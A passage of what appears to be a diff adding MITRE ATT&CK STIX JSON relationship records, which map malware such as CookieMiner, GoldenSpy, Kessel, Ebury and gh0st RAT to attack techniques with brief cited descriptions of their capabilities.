Exchanges\u2019 Cookies. Retrieved July 22, 2020." + } + ], + "description": "[CookieMiner](https://attack.mitre.org/software/S0492) has used Google Chrome's decryption and extraction operations.(Citation: Unit42 CookieMiner Jan 2019)", + "relationship_type": "uses", + "id": "relationship--8bed4012-0b27-409b-8236-1b5238dd477d", + "type": "relationship", + "modified": "2020-07-22T19:16:02.861Z", + "created": "2020-07-22T19:16:02.861Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--eedc01d5-95e6-4d21-bcd4-1121b1df4586", + "target_ref": "attack-pattern--cc3502b5-30cc-4473-ad48-42d51a6ef6d1", + "external_references": [ + { + "source_name": "Unit42 CookieMiner Jan 2019", + "url": "https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/", + "description": "Chen, y., et al. (2019, January 31). Mac Malware Steals Cryptocurrency Exchanges\u2019 Cookies. Retrieved July 22, 2020." + } + ], + "description": "[CookieMiner](https://attack.mitre.org/software/S0492) has used python scripts on the user\u2019s system, as well as the Python variant of the [Empire](https://attack.mitre.org/software/S0363) agent, EmPyre.(Citation: Unit42 CookieMiner Jan 2019)", + "relationship_type": "uses", + "id": "relationship--e2a29101-0b7e-4dab-adec-602712c09893", + "type": "relationship", + "modified": "2020-10-21T02:25:07.307Z", + "created": "2020-07-22T19:16:02.863Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--eedc01d5-95e6-4d21-bcd4-1121b1df4586", + "target_ref": "attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8", + "external_references": [ + { + "source_name": "Unit42 CookieMiner Jan 2019", + "url": "https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/", + "description": "Chen, y., et al. (2019, January 31). Mac Malware Steals Cryptocurrency Exchanges\u2019 Cookies. Retrieved July 22, 2020." + } + ], + "description": "[CookieMiner](https://attack.mitre.org/software/S0492) can steal saved usernames and passwords in Chrome as well as credit card credentials.(Citation: Unit42 CookieMiner Jan 2019)", + "relationship_type": "uses", + "id": "relationship--19bfa4e1-509b-417a-9bcc-b739f7d798a7", + "type": "relationship", + "modified": "2020-07-22T19:16:02.883Z", + "created": "2020-07-22T19:16:02.883Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--eedc01d5-95e6-4d21-bcd4-1121b1df4586", + "target_ref": "attack-pattern--10ffac09-e42d-4f56-ab20-db94c67d76ff", + "external_references": [ + { + "source_name": "Unit42 CookieMiner Jan 2019", + "url": "https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/", + "description": "Chen, y., et al. (2019, January 31). Mac Malware Steals Cryptocurrency Exchanges\u2019 Cookies. Retrieved July 22, 2020." + } + ], + "description": "[CookieMiner](https://attack.mitre.org/software/S0492) can steal Google Chrome and Apple Safari browser cookies from the victim\u2019s machine. (Citation: Unit42 CookieMiner Jan 2019)", + "relationship_type": "uses", + "id": "relationship--474e148d-4f4a-41d4-994e-d6425c7445f3", + "type": "relationship", + "modified": "2020-07-22T19:16:02.898Z", + "created": "2020-07-22T19:16:02.898Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--eedc01d5-95e6-4d21-bcd4-1121b1df4586", + "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add", + "external_references": [ + { + "source_name": "Unit42 CookieMiner Jan 2019", + "url": "https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/", + "description": "Chen, y., et al. (2019, January 31). Mac Malware Steals Cryptocurrency Exchanges\u2019 Cookies. Retrieved July 22, 2020." + } + ], + "description": "[CookieMiner](https://attack.mitre.org/software/S0492) can download additional scripts from a web server.(Citation: Unit42 CookieMiner Jan 2019)", + "relationship_type": "uses", + "id": "relationship--7f249ef4-8a3c-4ab5-998f-256ac8ecf588", + "type": "relationship", + "modified": "2020-07-22T19:16:02.900Z", + "created": "2020-07-22T19:16:02.900Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--eedc01d5-95e6-4d21-bcd4-1121b1df4586", + "target_ref": "attack-pattern--cd25c1b4-935c-4f0e-ba8d-552f28bc4783", + "external_references": [ + { + "source_name": "Unit42 CookieMiner Jan 2019", + "url": "https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/", + "description": "Chen, y., et al. (2019, January 31). Mac Malware Steals Cryptocurrency Exchanges\u2019 Cookies. Retrieved July 22, 2020." + } + ], + "description": "[CookieMiner](https://attack.mitre.org/software/S0492) has loaded coinmining software onto systems to mine for Koto cryptocurrency. (Citation: Unit42 CookieMiner Jan 2019)", + "relationship_type": "uses", + "id": "relationship--46af303d-51d3-4b85-90e2-ee75f62c022c", + "type": "relationship", + "modified": "2020-07-22T19:16:02.906Z", + "created": "2020-07-22T19:16:02.906Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--b9704a7d-feef-4af9-8898-5280f1686326", + "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670", + "external_references": [ + { + "source_name": "Trustwave GoldenSpy June 2020", + "url": "https://www.trustwave.com/en-us/resources/library/documents/the-golden-tax-department-and-the-emergence-of-goldenspy-malware/", + "description": "Trustwave SpiderLabs. (2020, June 25). The Golden Tax Department and Emergence of GoldenSpy Malware. Retrieved July 23, 2020." + } + ], + "description": "[GoldenSpy](https://attack.mitre.org/software/S0493) can execute remote commands in the Windows command shell using the WinExec() API.(Citation: Trustwave GoldenSpy June 2020)\t", + "relationship_type": "uses", + "id": "relationship--7b9bc78d-87b4-46a7-a5f9-73060535c47d", + "type": "relationship", + "modified": "2020-07-23T14:20:48.609Z", + "created": "2020-07-23T14:20:48.609Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--b9704a7d-feef-4af9-8898-5280f1686326", + "target_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2", + "external_references": [ + { + "source_name": "Trustwave GoldenSpy June 2020", + "url": "https://www.trustwave.com/en-us/resources/library/documents/the-golden-tax-department-and-the-emergence-of-goldenspy-malware/", + "description": "Trustwave SpiderLabs. (2020, June 25). The Golden Tax Department and Emergence of GoldenSpy Malware. Retrieved July 23, 2020." + } + ], + "description": "[GoldenSpy](https://attack.mitre.org/software/S0493)'s setup file installs initial executables under the folder %WinDir%\\System32\\PluginManager.(Citation: Trustwave GoldenSpy June 2020)\t", + "relationship_type": "uses", + "id": "relationship--7023af7e-91e0-4d7a-852e-ac7299820daa", + "type": "relationship", + "modified": "2020-07-23T14:20:48.635Z", + "created": "2020-07-23T14:20:48.635Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--b9704a7d-feef-4af9-8898-5280f1686326", + "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62", + "external_references": [ + { + "source_name": "Trustwave GoldenSpy June 2020", + "url": "https://www.trustwave.com/en-us/resources/library/documents/the-golden-tax-department-and-the-emergence-of-goldenspy-malware/", + "description": "Trustwave SpiderLabs. (2020, June 25). The Golden Tax Department and Emergence of GoldenSpy Malware. Retrieved July 23, 2020." + } + ], + "description": "[GoldenSpy](https://attack.mitre.org/software/S0493) can execute remote commands via the command-line interface.(Citation: Trustwave GoldenSpy June 2020)\t", + "relationship_type": "uses", + "id": "relationship--7c755f6c-11a3-43f7-9117-d25694338a3a", + "type": "relationship", + "modified": "2020-08-19T16:31:40.621Z", + "created": "2020-07-23T14:20:48.629Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--b9704a7d-feef-4af9-8898-5280f1686326", + "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18", + "external_references": [ + { + "source_name": "Trustwave GoldenSpy June 2020", + "url": "https://www.trustwave.com/en-us/resources/library/documents/the-golden-tax-department-and-the-emergence-of-goldenspy-malware/", + "description": "Trustwave SpiderLabs. (2020, June 25). The Golden Tax Department and Emergence of GoldenSpy Malware. Retrieved July 23, 2020." + } + ], + "description": "[GoldenSpy](https://attack.mitre.org/software/S0493) has included a program \"ExeProtector\", which monitors for the existence of [GoldenSpy](https://attack.mitre.org/software/S0493) on the infected system and redownloads if necessary.(Citation: Trustwave GoldenSpy June 2020)\t", + "relationship_type": "uses", + "id": "relationship--7f499274-44b7-4415-a8e8-6b2134a7873e", + "type": "relationship", + "modified": "2020-07-23T14:20:48.632Z", + "created": "2020-07-23T14:20:48.632Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--b9704a7d-feef-4af9-8898-5280f1686326", + "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161", + "external_references": [ + { + "source_name": "Trustwave GoldenSpy June 2020", + "url": "https://www.trustwave.com/en-us/resources/library/documents/the-golden-tax-department-and-the-emergence-of-goldenspy-malware/", + "description": "Trustwave SpiderLabs. (2020, June 25). The Golden Tax Department and Emergence of GoldenSpy Malware. Retrieved July 23, 2020." + } + ], + "description": "[GoldenSpy](https://attack.mitre.org/software/S0493) has used the Ryeol HTTP Client to facilitate HTTP internet communication.(Citation: Trustwave GoldenSpy June 2020)", + "relationship_type": "uses", + "id": "relationship--8ff83164-9bab-4fb5-8e6f-740f90829974", + "type": "relationship", + "modified": "2020-07-23T14:20:48.673Z", + "created": "2020-07-23T14:20:48.673Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--b9704a7d-feef-4af9-8898-5280f1686326", + "target_ref": "attack-pattern--b18eae87-b469-4e14-b454-b171b416bc18", + "external_references": [ + { + "source_name": "Trustwave GoldenSpy June 2020", + "url": "https://www.trustwave.com/en-us/resources/library/documents/the-golden-tax-department-and-the-emergence-of-goldenspy-malware/", + "description": "Trustwave SpiderLabs. (2020, June 25). The Golden Tax Department and Emergence of GoldenSpy Malware. Retrieved July 23, 2020." + } + ], + "description": "[GoldenSpy](https://attack.mitre.org/software/S0493) has used HTTP over ports 9005 and 9006 for network traffic, 9002 for C2 requests, 33666 as a WebSocket, and 8090 to download files.(Citation: Trustwave GoldenSpy June 2020)", + "relationship_type": "uses", + "id": "relationship--2243acac-6401-41df-b658-2a36f7977d15", + "type": "relationship", + "modified": "2020-08-19T16:31:40.661Z", + "created": "2020-07-23T14:20:48.669Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--b9704a7d-feef-4af9-8898-5280f1686326", + "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add", + "external_references": [ + { + "source_name": "Trustwave GoldenSpy June 2020", + "url": "https://www.trustwave.com/en-us/resources/library/documents/the-golden-tax-department-and-the-emergence-of-goldenspy-malware/", + "description": "Trustwave SpiderLabs. (2020, June 25). The Golden Tax Department and Emergence of GoldenSpy Malware. Retrieved July 23, 2020." + } + ], + "description": "[GoldenSpy](https://attack.mitre.org/software/S0493) constantly attempts to download and execute files from the remote C2, including [GoldenSpy](https://attack.mitre.org/software/S0493) itself if not found on the system.(Citation: Trustwave GoldenSpy June 2020)\t", + "relationship_type": "uses", + "id": "relationship--b6d77871-1b71-4b65-b04b-9ee1d4b80a9c", + "type": "relationship", + "modified": "2020-07-23T14:20:48.692Z", + "created": "2020-07-23T14:20:48.692Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--b9704a7d-feef-4af9-8898-5280f1686326", + "target_ref": "attack-pattern--635cbe30-392d-4e27-978e-66774357c762", + "external_references": [ + { + "source_name": "Trustwave GoldenSpy June 2020", + "url": "https://www.trustwave.com/en-us/resources/library/documents/the-golden-tax-department-and-the-emergence-of-goldenspy-malware/", + "description": "Trustwave SpiderLabs. (2020, June 25). The Golden Tax Department and Emergence of GoldenSpy Malware. Retrieved July 23, 2020." + } + ], + "description": "[GoldenSpy](https://attack.mitre.org/software/S0493) can create new users on an infected system.(Citation: Trustwave GoldenSpy June 2020)\t", + "relationship_type": "uses", + "id": "relationship--172e2d4d-5739-40d3-ae0d-4bf76890e79f", + "type": "relationship", + "modified": "2020-07-23T14:20:48.694Z", + "created": "2020-07-23T14:20:48.694Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--b9704a7d-feef-4af9-8898-5280f1686326", + "target_ref": "attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0", + "external_references": [ + { + "source_name": "Trustwave GoldenSpy June 2020", + "url": "https://www.trustwave.com/en-us/resources/library/documents/the-golden-tax-department-and-the-emergence-of-goldenspy-malware/", + "description": "Trustwave SpiderLabs. (2020, June 25). The Golden Tax Department and Emergence of GoldenSpy Malware. Retrieved July 23, 2020." + } + ], + "description": "[GoldenSpy](https://attack.mitre.org/software/S0493)'s installer has delayed installation of [GoldenSpy](https://attack.mitre.org/software/S0493) for two hours after it reaches a victim system.(Citation: Trustwave GoldenSpy June 2020)\t", + "relationship_type": "uses", + "id": "relationship--bd289f02-1354-423e-b5e4-7aca35ec9d8a", + "type": "relationship", + "modified": "2020-07-23T14:20:48.703Z", + "created": "2020-07-23T14:20:48.703Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--b9704a7d-feef-4af9-8898-5280f1686326", + "target_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d", + "external_references": [ + { + "source_name": "Trustwave GoldenSpy June 2020", + "url": "https://www.trustwave.com/en-us/resources/library/documents/the-golden-tax-department-and-the-emergence-of-goldenspy-malware/", + "description": "Trustwave SpiderLabs. (2020, June 25). The Golden Tax Department and Emergence of GoldenSpy Malware. Retrieved July 23, 2020." + } + ], + "description": "[GoldenSpy](https://attack.mitre.org/software/S0493) has exfiltrated host environment information to an external C2 domain via port 9006.(Citation: Trustwave GoldenSpy June 2020)\t", + "relationship_type": "uses", + "id": "relationship--5409a62e-d298-4026-8829-550306e8e4a6", + "type": "relationship", + "modified": "2020-07-23T14:20:48.735Z", + "created": "2020-07-23T14:20:48.735Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--b9704a7d-feef-4af9-8898-5280f1686326", + "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1", + "external_references": [ + { + "source_name": "Trustwave GoldenSpy June 2020", + "url": "https://www.trustwave.com/en-us/resources/library/documents/the-golden-tax-department-and-the-emergence-of-goldenspy-malware/", + "description": "Trustwave SpiderLabs. (2020, June 25). The Golden Tax Department and Emergence of GoldenSpy Malware. Retrieved July 23, 2020." + } + ], + "description": "[GoldenSpy](https://attack.mitre.org/software/S0493) has gathered operating system information.(Citation: Trustwave GoldenSpy June 2020)\t", + "relationship_type": "uses", + "id": "relationship--1489f01c-fe49-4332-99e2-d72c487403b6", + "type": "relationship", + "modified": "2020-08-19T16:31:40.707Z", + "created": "2020-07-23T14:20:48.737Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--b9704a7d-feef-4af9-8898-5280f1686326", + "target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32", + "external_references": [ + { + "source_name": "Trustwave GoldenSpy June 2020", + "url": "https://www.trustwave.com/en-us/resources/library/documents/the-golden-tax-department-and-the-emergence-of-goldenspy-malware/", + "description": "Trustwave SpiderLabs. (2020, June 25). The Golden Tax Department and Emergence of GoldenSpy Malware. Retrieved July 23, 2020." + } + ], + "description": "[GoldenSpy](https://attack.mitre.org/software/S0493) has established persistence by running in the background as an autostart service.(Citation: Trustwave GoldenSpy June 2020)\t", + "relationship_type": "uses", + "id": "relationship--0fee7bbd-8d36-48e2-b800-9d2f02c06123", + "type": "relationship", + "modified": "2020-08-19T16:31:40.705Z", + "created": "2020-07-23T14:20:48.742Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--b9704a7d-feef-4af9-8898-5280f1686326", + "target_ref": "attack-pattern--bd369cd9-abb8-41ce-b5bb-fff23ee86c00", + "external_references": [ + { + "source_name": "Trustwave GoldenSpy June 2020", + "url": "https://www.trustwave.com/en-us/resources/library/documents/the-golden-tax-department-and-the-emergence-of-goldenspy-malware/", + "description": "Trustwave SpiderLabs. (2020, June 25). The Golden Tax Department and Emergence of GoldenSpy Malware. Retrieved July 23, 2020." + } + ], + "description": "[GoldenSpy](https://attack.mitre.org/software/S0493) has been packaged with a legitimate tax preparation software.(Citation: Trustwave GoldenSpy June 2020)", + "relationship_type": "uses", + "id": "relationship--6edbc35f-fc02-43ba-84d2-17ff8100f094", + "type": "relationship", + "modified": "2020-08-19T16:31:40.703Z", + "created": "2020-07-23T14:20:48.749Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--b9704a7d-feef-4af9-8898-5280f1686326", + "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c", + "external_references": [ + { + "source_name": "Trustwave GoldenSpy2 June 2020", + "url": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/goldenspy-chapter-two-the-uninstaller/", + "description": "Trustwave SpiderLabs. (2020, June 26). GoldenSpy: Chapter Two \u2013 The Uninstaller. Retrieved July 23, 2020." + } + ], + "description": "[GoldenSpy](https://attack.mitre.org/software/S0493)'s uninstaller can delete registry entries, files and folders, and finally itself once these tasks have been completed.(Citation: Trustwave GoldenSpy2 June 2020)", + "relationship_type": "uses", + "id": "relationship--8c2a7700-2054-4db1-b566-391f23a9f30a", + "type": "relationship", + "modified": "2020-07-23T14:29:04.748Z", + "created": "2020-07-23T14:29:04.748Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--b9704a7d-feef-4af9-8898-5280f1686326", + "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "external_references": [ + { + "source_name": "Trustwave GoldenSpy2 June 2020", + "url": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/goldenspy-chapter-two-the-uninstaller/", + "description": "Trustwave SpiderLabs. (2020, June 26). GoldenSpy: Chapter Two \u2013 The Uninstaller. Retrieved July 23, 2020." + } + ], + "description": "[GoldenSpy](https://attack.mitre.org/software/S0493)'s uninstaller has base64-encoded its variables. (Citation: Trustwave GoldenSpy2 June 2020)", + "relationship_type": "uses", + "id": "relationship--d4962990-8bb3-46b9-9ca3-c946fd6ce07e", + "type": "relationship", + "modified": "2020-07-23T14:29:04.744Z", + "created": "2020-07-23T14:29:04.744Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--4c6d62c2-89f5-4159-8fab-0190b1f9d328", + "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830", + "external_references": [ + { + "source_name": "ESET ForSSHe December 2018", + "url": "https://www.welivesecurity.com/wp-content/uploads/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf", + "description": "Dumont, R., M.L\u00e9veill\u00e9, M., Porcher, H. (2018, December 1). THE DARK SIDE OF THE FORSSHE A landscape of OpenSSH backdoors. Retrieved July 16, 2020." + } + ], + "description": "[Bonadan](https://attack.mitre.org/software/S0486) can create bind and reverse shells on the infected system.(Citation: ESET ForSSHe December 2018)\t", + "relationship_type": "uses", + "id": "relationship--f56f953d-7df2-4eee-93b6-f2c8377153bb", + "type": "relationship", + "modified": "2020-07-23T16:24:07.813Z", + "created": "2020-07-23T16:24:07.813Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--4c6d62c2-89f5-4159-8fab-0190b1f9d328", + "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "external_references": [ + { + "source_name": "ESET ForSSHe December 2018", + "url": "https://www.welivesecurity.com/wp-content/uploads/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf", + "description": "Dumont, R., M.L\u00e9veill\u00e9, M., Porcher, H. (2018, December 1). THE DARK SIDE OF THE FORSSHE A landscape of OpenSSH backdoors. Retrieved July 16, 2020." + } + ], + "description": "[Bonadan](https://attack.mitre.org/software/S0486) can use the ps command to discover other cryptocurrency miners active on the system.(Citation: ESET ForSSHe December 2018)", + "relationship_type": "uses", + "id": "relationship--f6030347-c316-4c5c-b7ce-84c39aa09f85", + "type": "relationship", + "modified": "2020-07-23T16:24:07.818Z", + "created": "2020-07-23T16:24:07.818Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--c984b414-b766-44c5-814a-2fe96c913c12", + "target_ref": "attack-pattern--04fd5427-79c7-44ea-ae13-11b24778ff1c", + "external_references": [ + { + "source_name": "ESET ForSSHe December 2018", + "url": "https://www.welivesecurity.com/wp-content/uploads/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf", + "description": "Dumont, R., M.L\u00e9veill\u00e9, M., Porcher, H. (2018, December 1). THE DARK SIDE OF THE FORSSHE A landscape of OpenSSH backdoors. Retrieved July 16, 2020." + } + ], + "description": "[Kessel](https://attack.mitre.org/software/S0487) has exfiltrated data via hexadecimal-encoded subdomain fields of DNS queries.(Citation: ESET ForSSHe December 2018)", + "relationship_type": "uses", + "id": "relationship--90126438-03a9-47c8-98c1-222a1d79ef21", + "type": "relationship", + "modified": "2020-08-10T19:43:38.327Z", + "created": "2020-07-23T16:50:06.423Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--c984b414-b766-44c5-814a-2fe96c913c12", + "target_ref": "attack-pattern--f4c1826f-a322-41cd-9557-562100848c84", + "external_references": [ + { + "source_name": "ESET ForSSHe December 2018", + "url": "https://www.welivesecurity.com/wp-content/uploads/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf", + "description": "Dumont, R., M.L\u00e9veill\u00e9, M., Porcher, H. (2018, December 1). THE DARK SIDE OF THE FORSSHE A landscape of OpenSSH backdoors. Retrieved July 16, 2020." + } + ], + "description": "[Kessel](https://attack.mitre.org/software/S0487) has trojanized the ssh_login and user-auth_pubkey functions to steal plaintext credentials.(Citation: ESET ForSSHe December 2018)", + "relationship_type": "uses", + "id": "relationship--8544d4c3-e2e5-44c6-b57d-a169143f49eb", + "type": "relationship", + "modified": "2020-07-23T16:50:06.426Z", + "created": "2020-07-23T16:50:06.426Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--c984b414-b766-44c5-814a-2fe96c913c12", + "target_ref": "attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a", + "external_references": [ + { + "source_name": "ESET ForSSHe December 2018", + "url": "https://www.welivesecurity.com/wp-content/uploads/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf", + "description": "Dumont, R., M.L\u00e9veill\u00e9, M., Porcher, H. (2018, December 1). THE DARK SIDE OF THE FORSSHE A landscape of OpenSSH backdoors. Retrieved July 16, 2020." + } + ], + "description": "[Kessel](https://attack.mitre.org/software/S0487) can RC4-encrypt credentials before sending to the C2.(Citation: ESET ForSSHe December 2018)\t", + "relationship_type": "uses", + "id": "relationship--9433ea0e-0bae-44b6-b32b-5290356f057b", + "type": "relationship", + "modified": "2020-07-23T16:50:06.592Z", + "created": "2020-07-23T16:50:06.592Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--c984b414-b766-44c5-814a-2fe96c913c12", + "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830", + "external_references": [ + { + "source_name": "ESET ForSSHe December 2018", + "url": "https://www.welivesecurity.com/wp-content/uploads/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf", + "description": "Dumont, R., M.L\u00e9veill\u00e9, M., Porcher, H. (2018, December 1). THE DARK SIDE OF THE FORSSHE A landscape of OpenSSH backdoors. Retrieved July 16, 2020." + } + ], + "description": "[Kessel](https://attack.mitre.org/software/S0487) can create a reverse shell between the infected host and a specified system.(Citation: ESET ForSSHe December 2018)\t", + "relationship_type": "uses", + "id": "relationship--46da305e-d59a-42a4-9d2b-cdd223c69664", + "type": "relationship", + "modified": "2020-07-23T16:50:06.597Z", + "created": "2020-07-23T16:50:06.597Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--d6b3fcd0-1c86-4350-96f0-965ed02fcc51", + "target_ref": "attack-pattern--f4c1826f-a322-41cd-9557-562100848c84", + "external_references": [ + { + "source_name": "ESET Ebury Feb 2014", + "url": "https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/", + "description": "M.L\u00e9veill\u00e9, M.. (2014, February 21). An In-depth Analysis of Linux/Ebury. Retrieved April 19, 2019." + } + ], + "description": "[Ebury](https://attack.mitre.org/software/S0377) can intercept private keys using a trojanized ssh-add function.(Citation: ESET Ebury Feb 2014)", + "relationship_type": "uses", + "id": "relationship--5b5a618e-3a67-4223-a158-af4ce7e0c7d9", + "type": "relationship", + "modified": "2020-07-23T17:01:00.356Z", + "created": "2020-07-23T17:01:00.356Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--88c621a7-aef9-4ae0-94e3-1fc87123eb24", + "target_ref": "attack-pattern--04fd5427-79c7-44ea-ae13-11b24778ff1c", + "external_references": [ + { + "source_name": "Gh0stRAT ATT March 2019", + "url": "https://cybersecurity.att.com/blogs/labs-research/the-odd-case-of-a-gh0strat-variant", + "description": "Quinn, J. (2019, March 25). The odd case of a Gh0stRAT variant. Retrieved July 15, 2020." + } + ], + "description": "[gh0st RAT](https://attack.mitre.org/software/S0032) has used Zlib to compress C2 communications data before encrypting it.(Citation: Gh0stRAT ATT March 2019)", + "relationship_type": "uses", + "id": "relationship--c16854fa-add6-4be3-9547-05cc479861d8", + "type": "relationship", + "modified": "2020-07-24T13:48:49.757Z", + "created": "2020-07-24T13:48:49.757Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": 